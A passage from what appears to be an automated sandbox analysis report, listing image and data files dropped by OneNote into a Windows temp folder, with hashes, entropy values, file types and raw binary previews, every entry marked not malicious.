Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Temp\{BE1877FE-00BF-4972-90B0-2924B71138A7}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	67991
Entropy (8bit):	7.870481231782746
Encrypted:	false
SSDEEP:	1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
MD5:	1271B1905D18A40D79A5B9DB27EE97EA
SHA1:	9618608FBD7342DE6C71220A36C3F4995BA9C13E
SHA-256:	5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
SHA-512:	C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..\|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....\|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi.k..?#..._...X..R.&]..[..;../]L..f..V.......e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.

C:\Users\user\AppData\Local\Temp\{C01DD1B0-928C-4DD3-86DD-100D0A3B6F73}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6521617302431695
Encrypted:	false
SSDEEP:	6:RasLbYyfB3h1RRXUnfDXfaFFFBl/FKuksEvksRRujlw//0lweI/k9vksTRujd:Ras3Yyf9/UfzfaFFFBtgDM5Wf/cMx
MD5:	A9FA1DBF1FBE1973D539927104CA3C98
SHA1:	3AD9FD9B9B033F746958621DC44488B371321CD7
SHA-256:	37EB26160FA906BBDF1DAC7BAC7BD64824C1018703A94710D9DCAB24537BAEAE
SHA-512:	A26845DA7B3ACB08D9C654595C451C472EB37C960AE66C69C894D4D1E9A256F34C8843064C6248F177ED0905DB7A668A4FCDF582E490BD5623AAD7CE314C970B
Malicious:	false
Preview:	./.C..vL....W"v_./....B. ......................?.....I...............................................................................................................h..............................................:#.G...q..5.............N.2K...Y...............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{C0BD47D2-7A33-4409-AF0F-4A33D174D3FA}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	60924
Entropy (8bit):	7.758472758205366
Encrypted:	false
SSDEEP:	1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
MD5:	D58C51D2CF586A5E14A9EC8529C3B0A8
SHA1:	F4811A353797C29B1E3F5A61B125C46E1534D587
SHA-256:	F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
SHA-512:	34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.........................................................yK..xd...6..\|%....\j..e.=...Y..f..I.\|-....e...$R.j.......~.W#....{.....V.k.\|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.\|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.......................................................

C:\Users\user\AppData\Local\Temp\{C3A5D077-638E-4AAB-906F-3F885441A6B5}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
Category:	dropped
Size (bytes):	12654
Entropy (8bit):	7.745439197485533
Encrypted:	false
SSDEEP:	384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
MD5:	4BCCCDBB4273ECEBE216C84930A8D0B2
SHA1:	FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
SHA-256:	474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
SHA-512:	DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+.....4W...lUFh....v..._..wn...dW....y._..v..E~......@wn...dW....y._...v..U..@wn...d..{`;.\|U.2g....3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep

C:\Users\user\AppData\Local\Temp\{C5A3962A-4AF7-4366-ACF9-E18FB4AA9EF3}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Temp\{CACFC1E5-5A49-4A73-988F-FCFDE2A4D037}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.64932279031392
Encrypted:	false
SSDEEP:	6:RaEzk7YyfB3h1RRXUnf08FJzFFFBl/FK/6dXdaRujlw//0lweI/yRdWRujd:RaEzk7Yyf9/Uf08LFFFBtGytXWf/ynb
MD5:	9AEE71F86F0FC815A26E6B26B68A5DE0
SHA1:	A41878CCF2230478A576577A5785468E38B157EE
SHA-256:	E6CCBC8E71D2C16D80C179870D18734ABA0CED18BBD8CBD548385F5789EC8820
SHA-512:	62FC145FA16933DFB8EA67ECFCACC4B11122F56E888040488F066B1B8B4C03F0849FCABC517E34F3F5190888DD3A5CF32A7FC73F6AB78205761357762884C946
Malicious:	false
Preview:	./.C..vL....W"v_f.v.H.^E..Y...................?.....I...............................................................................................................h...........................................<.>X.B&G..d.1.........*.$K.4.J..S.. ..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{CC297968-4B7E-404A-8D9A-3AD171C40DC1}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	GIF image data, version 89a, 1012 x 327
Category:	dropped
Size (bytes):	11765
Entropy (8bit):	7.911655818336033
Encrypted:	false
SSDEEP:	192:aUpmR1MS7mEuHIgBEoe/nOdV8EHi+rBJZ2M6qhH03NMWjvD5ZktcatNy+AT3jCOj:aUOVTi9EoDH8ujBJwMvhU3mgocatgdOm
MD5:	B035F23C68CC9673E604FE5472F223D2
SHA1:	56495B558547AACCE34C65C1D1FCF6C9ECAFCEE1
SHA-256:	F3F791A1303058D4F363E02F0515DE8484249624857CAF5ECE6C926D7324114C
SHA-512:	B6923EC5D91F5C771B65C63A97AB23BC8E6762CA60C31DEE8D1D141703923EDDFC266229B263EA88E10AF89A92C0EF361BF91A3D5CB600AE129C452D94580662
Malicious:	false
Preview:	GIF89a..G.................................................................................................................................................................\|.................................................................................................Y..Z..\.._..a..c..d..f..e..i..k..m..n..p..s..r..v..y..z..}..~....................0..3..5..6..7..9..<..>..@..B..C..E..G..J..N..N..P..R..T..V..[.................................................. ..!..#..#.."..$..&..&..(..)..+..+..,..,.....1..3..4..6..9..;..=..?..B..E..G..I..L..N..O..Q..S..W..Z..]..^..`..a..b..d..g..h..j..m..p..s..u..x..{..\|..~.................................................................................................................................................!.......,......G........H......\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.]...P.J.J...X.j....`..K...h.]...p..K...x..........L....N....8q..i.L....3k.....C..M....S.^....

C:\Users\user\AppData\Local\Temp\{CEE895D7-AE38-4AA2-90A3-579E7BDA6FF5}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
Category:	dropped
Size (bytes):	2268
Entropy (8bit):	7.384274251000273
Encrypted:	false
SSDEEP:	48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
MD5:	09A7AE94AA8E517298A9618A13D6E0E2
SHA1:	FA5181A7414BA32F816BF0C4278EC20C615E8B1A
SHA-256:	3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
SHA-512:	074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.\|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.\|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)..TT...."....T.Tc.j..............j.z!.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._.._C.k..p9.p..O..vu...'........0v

C:\Users\user\AppData\Local\Temp\{D5F0E9DD-FBD8-4953-B46C-F9DB7DA367DD}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
Category:	dropped
Size (bytes):	1717
Entropy (8bit):	7.154087739587035
Encrypted:	false
SSDEEP:	48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
MD5:	943371B39CA847674998535110462220
SHA1:	5CA79B7BD7E0E93271463FAEF3280F1644CBA073
SHA-256:	9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
SHA-512:	812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J....Q...b.Q..Ah....Ah..b.Ah..b.PZ.(.@z.?.`;2.......................................................Q...b.Q..EZ.(..Z>.G.....`Z+E......J....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.

C:\Users\user\AppData\Local\Temp\{D70D490C-995A-4017-B34A-DBD1A2B3FDF2}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
Category:	dropped
Size (bytes):	65998
Entropy (8bit):	7.671031449942883
Encrypted:	false
SSDEEP:	1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
MD5:	B4F0A040890EE6F61EF8D9E094893C9C
SHA1:	303BCBA1D777B03BFD99CC01A48E0BB493C93E04
SHA-256:	1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
SHA-512:	8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.

C:\Users\user\AppData\Local\Temp\{DAC9FA44-839F-46BD-83B7-97EC6BD42311}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	4410
Entropy (8bit):	7.857636973514526
Encrypted:	false
SSDEEP:	96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
MD5:	2494381A1ACDC83843B912CFCDE5643B
SHA1:	98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
SHA-256:	5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
SHA-512:	0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
Malicious:	false
Preview:	.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}\|..{'.U..~......}....s.............,CVu.x.:C..5...;.

C:\Users\user\AppData\Local\Temp\{DD15B68C-1BA1-45A2-9D66-5D3A0D3069A2}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Temp\{DD184555-86D6-45A9-A64B-30DF393AF2DE}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
Category:	dropped
Size (bytes):	140755
Entropy (8bit):	7.9013245181576695
Encrypted:	false
SSDEEP:	3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
MD5:	CC087700C07D674D69AFDFDA0FA9825C
SHA1:	F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
SHA-256:	A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
SHA-512:	843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.

C:\Users\user\AppData\Local\Temp\{DE473569-C2F2-483E-B7EA-2C57CD640CC9}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Temp\{E5124E2A-C74F-4E46-9927-4EF938DDECAB}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6478591738327985
Encrypted:	false
SSDEEP:	12:RaN9cPTYyf9/UfkWFFBtlaHeQHeNWf/G8HeF:YvEYyfScQtB/R
MD5:	27932DCE2B2A2361C604652E32C9A3E3
SHA1:	64676C051F18BBBC2D540D6E82A828FA2C6B4E59
SHA-256:	7DDA33A48C3FEDD1FAC743FF1502259F9433F3D90C30E1515F5322A8F6C7F22A
SHA-512:	DB0222A7FD4890698D6F78F4D9143B1D8959C8457C9BC1991CE9235929BCEF9AEB8705EF685EE2E326E98F88B8FBD82E6BA213C465B3A329EB90A54FDDAA6C47
Malicious:	false
Preview:	./.C..vL....W"v_..p....B..S`>...................?.....I...............................................................................................................h...........................................=t.O..h@...s..0..........'i(,K..RM.:............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{E59FADF5-B19E-4B91-85EF-9F2BBD40B8DE}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Temp\{ECBD3809-8183-4203-BB37-67F10CC549D2}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
